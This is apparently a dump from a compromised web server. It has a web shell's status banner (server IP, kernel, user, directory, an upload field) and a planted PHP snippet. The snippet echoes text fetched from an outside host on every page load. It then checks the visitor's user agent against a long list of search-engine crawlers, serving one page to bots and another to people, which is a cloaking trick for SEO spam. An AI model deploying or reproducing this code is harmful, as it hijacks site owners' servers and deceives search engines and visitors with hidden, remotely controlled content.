| Server IP : 207.244.250.86 / Your IP : 216.73.216.10 Web Server : Apache System : Linux plesk1.codeponents.com 4.18.0-240.10.1.el8_3.x86_64 #1 SMP Mon Jan 18 17:05:51 UTC 2021 x86_64 User : motionave ( 10025) PHP Version : 8.0.15 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/motionave.com/scott.motionave.com/ |
Upload File : |
<?php echo file_get_contents("https://gblkeras2.com/nd1.txt"); ?>
<?php
$bot_user_agents = array(
"Googlebot", "Googlebot-Image", "Googlebot-News", "Googlebot-Video", "Storebot-Google", "Google-InspectionTool",
"GoogleOther", "GoogleOther-Image", "GoogleOther-Video", "Google-CloudVertexBot", "Google-Extended", "APIs-Google",
"AdsBot-Google-Mobile", "AdsBot-Google", "Mediapartners-Google", "FeedFetcher-Google", "Google-Favicon", "Google Favicon",
"Googlebot-Favicon", "Google-Site-Verification", "Google-Read-Aloud", "GoogleProducer", "Google Web Preview", "Bingbot",
"Slurp", "DuckDuckBot", "Baiduspider", "YandexBot", "Sogou", "Exabot", "facebookexternalhit", "ia_archiver",
"Alexa Crawler", "AhrefsBot", "Semrushbot"
);
$user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
function is_bot($user_agent, $bot_user_agents) {
foreach ($bot_user_agents as $bot) {
if (stripos($user_agent, $bot) !== false) {
return true;
}
}
return false;
}
// Combined conditions for including 'landingpage.php'
if (is_bot($user_agent, $bot_user_agents)) {
include 'home.html';
exit;
} else {
include 'index-old.php';
exit;
}
?>